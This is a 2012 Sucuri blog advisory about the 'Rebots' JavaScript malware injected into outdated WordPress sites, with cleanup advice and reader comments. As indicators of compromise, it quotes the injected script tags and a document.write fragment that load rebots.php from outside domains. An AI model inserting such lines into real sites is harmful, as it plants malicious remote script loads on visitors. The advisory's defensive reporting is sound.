• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
Rebots

Rebots.php JavaScript Malware Being Actively Injected

August 24, 2012Dre Armeda

1
SHARES
FacebookTwitterSubscribe

Holy JavaScript malware, Batman! On August 11th we started seeing the Rebot JavaScript malware string injected on various websites. Since then, it has increased its appearances, and has variated the way it’s being included on the infected sites.

When you visit a compromised site, it will attempt to load an additional JavaScript, like one of these:

<script src="http://lig-limp.com.br/rebots.php"..

<script; src="http://chezbruna.com.br/imagens/rebots.php"..

What’s It Do?

From what we’re seeing now, not much. The domains being included by the script call are either 404 at this point, or loading broken code leading to dead links. For example:

if(navigator.javaEnabled()) {
	document.write(' src="http://chezbruna.com.br//imagens/rebots.php?action=jv&h=1687634524"

The pages on a site you may find it will vary, and so will the files that are actually infected. Here’s a quick SiteCheck screen:

SiteCheck

Note: Notice that SiteCheck shows the site outdated. This website was running WordPress 3.2.1 at the time of scan. This seems to be a common theme across the websites we’re seeing affected by Rebots.

Where to Find it

As mentioned, this will variate. Originally we were seeing the script called in theme templates. At first the script would appear above the HTML tags in the rendered source, and we were finding the offending code in header.php and/or index.php within the active WordPress theme.

Over the next few days, those instances were still happening, but we also started seeing the script called from functions.php and even stylesheets within the active theme.

Apparently this got old quick, next we started seeing the script appear in text widgets within WordPress.

Rebot in Widgets

Quick Info

We’re still researching numbers and hopefully it quits growing. So far, we have seeing infections with those URLS:

http://hroil.com.br/old/rebots.php - 98 sites infected with it
http://lig-limp.com.br/rebots.php - 357 sites infected with it
http://chezbruna.com.br/imagens/rebots.php - 497 sites infected with it

That’s only the ones that we scanned directly. However, if you go on Google and search for “chezbruna.com.br/imagens/rebots.php” or “lig-limp.com.br/rebots.php” you’ll see quite a few more sites being affected.

What Do I do?

First thing do check is that all the software on your server is updated. I’m talking applications, themes, plugins, and so on. If you don’t use it, get rid of it. Cross-Website Contamination happens all too often, so make sure to do some website garage cleaning ASAP.

Next thing to do is go scan your site with Sucuri SiteCheck. Seriously, it takes second, it’s free, and it will let you know if you’ve been struck by Rebots.

If you have been hit and you need a hand clearing it, we can get you cleared and will cover you for the year. Check our the Sucuri service plans today.


Have you seen the Rebots JS Malware? What’s your experience? Have you seen variations, or other domains affected? Feel free to email Sucuri, or leave a comment below.

1
SHARES
FacebookTwitterSubscribe

Categories: Security Advisory, Website Malware Infections, WordPress SecurityTags: Hacked Websites

About Dre Armeda

Dre Armeda was Sucuri’s founding CEO and Co-Founder who helped start up the company in 2010. Today, Dre is Sr. Director of Technical Program Management and serves as Head of Technical Program Management (TPM) for GoDaddy's Partners Business. As head of TPM, Dre leads the PMO and Program Delivery Teams, ultimately driving all the program management functions and supporting our partners. When Dre isn't executing strategic initiatives at GoDaddy, you can find him on the mat training in Jiu Jitsu as a Carlson Gracie brown belt. Connect with Dre on Twitter.

Reader Interactions

Comments

  1. Kailey ʇɹǝdɯɐl

    August 24, 2012

    Doesn’t seem related, but on the same site I cleaned up this Rebots hack yesterday I also found some unwanted gzipped files in /wp-content/plugins/ ( http://cl.ly/IzXC ). When downloaded, unzipped and looked at, they produced fake bank sign in pages ( http://cl.ly/IyFl and http://cl.ly/IyaL )

  2. n00bs@uc3

    August 24, 2012

    What’s it dropping?!

    • Andres Armeda

      August 24, 2012

      At this point just the JS to those sites. It looks like most of those sites have been disabled. We did test it using various user agents and such to see if we could get anything elsqe out of it, nothing conclusive found.

  3. Brett Dalbeth

    August 28, 2012

    I got bit.. I needed an exsuse to build a new website anyways.

  4. theGuruWithin

    August 29, 2012

    thank you for these updates. I find this arena fascinating. Do you ever have any career opportunities?

  5. sarabjeet singh

    September 26, 2012

    Great post indeed and thanks for all the information, it was very helpful i really like that you are providing information on PHP and MYSQL with basic JAVASCRIPT,being enrolled in http://www.wiziq.com/course/5871-php-mysql-with-basic-javascript-integrated-course i was looking for such information online to assist me on php and mysql and your information helped

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

WordPress Security Course

The Anatomy of Website Malware Webinar

WordPress Security Guide

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2021 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.